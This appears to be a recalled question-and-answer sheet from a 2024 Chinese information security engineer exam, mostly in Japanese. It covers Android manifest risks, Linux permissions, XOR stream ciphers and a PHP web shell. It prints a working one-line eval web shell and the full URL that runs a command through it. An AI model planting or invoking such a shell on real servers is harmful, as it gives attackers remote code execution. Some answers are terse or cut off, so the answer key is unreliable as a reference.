
2024年信息安全工程师、2024InformationSecurityEngineer
2024年情報セキュリティエンジニア、2024InformationSecurityEngineer
软考-試験日時 : 2024年11月08日
署名を格納するディレクトリ/ファイル___(2点) 答:META-INF
権限を格納するディレクトリ/ファイル___(2点) 答:AndroidManifest.xml
問題5(10点) (1)どの設定がバックアップをサポートするか; (2)履歴の位置情報を読み取ることができるが、セキュリティ上のリスクがあるか; (3)設定ファイルの中で、四大コンポーネントのうちどれが使用されているか; (4)どのコンポーネントの情報漏えいリスクが最も高いか; (5)情報の濫用はあるか?詳しく説明せよ;
答: (1)backup...... バックアップをサポートしない (2)リスクがある。未知の情報が漏えいする危険性がある (3)Activity、BroadcastRecevier (4)Contentprovider (5)情報の濫用はある。位置権限、カメラ権限、ストレージ権限、連絡先、マルチメディア、Bluetoothなどの権限が多く、過剰に収集されている
Android内のユーザーにroot権限があるか(2点) 答:なし
llの正式名称___(2点)答:ls -l
現在はrootか一般ユーザーか___(2点) 答:root
ファイル権限の数字表現___(2点)答:rw-r--r-- 644
図中の../は何を意味するか___(2点)答:上位ディレクトリ、/var/www/html
Linuxに標準搭載されているハッシュ値を計算するコマンド___(2点)md5sum; sha1sum; shasum -a 256
shell.php <?php @eval($_GET["cmd"]); ?> (5点)
- このファイルに対応する接続パスワードは何か 答:cmd
- HTTPのどのリクエストメソッドか 答:GET
- ドメイン名がabc.comだと仮定した場合、whoamiを実行する完全なリクエストURL 答:abc.com/shell.php?cmd=system("whoami")
- 対称と非対称の他に、平文の処理方式に基づいてどのように暗号化できるか(2点) 答:ブロック暗号とストリーム暗号
- aの8ビット(2点) 答:97 ---》 01100001
- aとabcのXOR暗号化の結果(6点) 答:032 または 00000000 00000011 00000010
- mi, ki, ciが与えられたとき、平文を求める式はどのようになるか(2点) 答:mi = ki 排他的論理和(XOR)^ ci
- 異なる2つの平文を同じストリーム暗号鍵で暗号化するのは安全か?なぜか?(2点) 答:安全ではない。一方の平文からもう一方の平文を導き出せる
- ブロック暗号はストリーム暗号を使用できるか(1点) 答:使用できる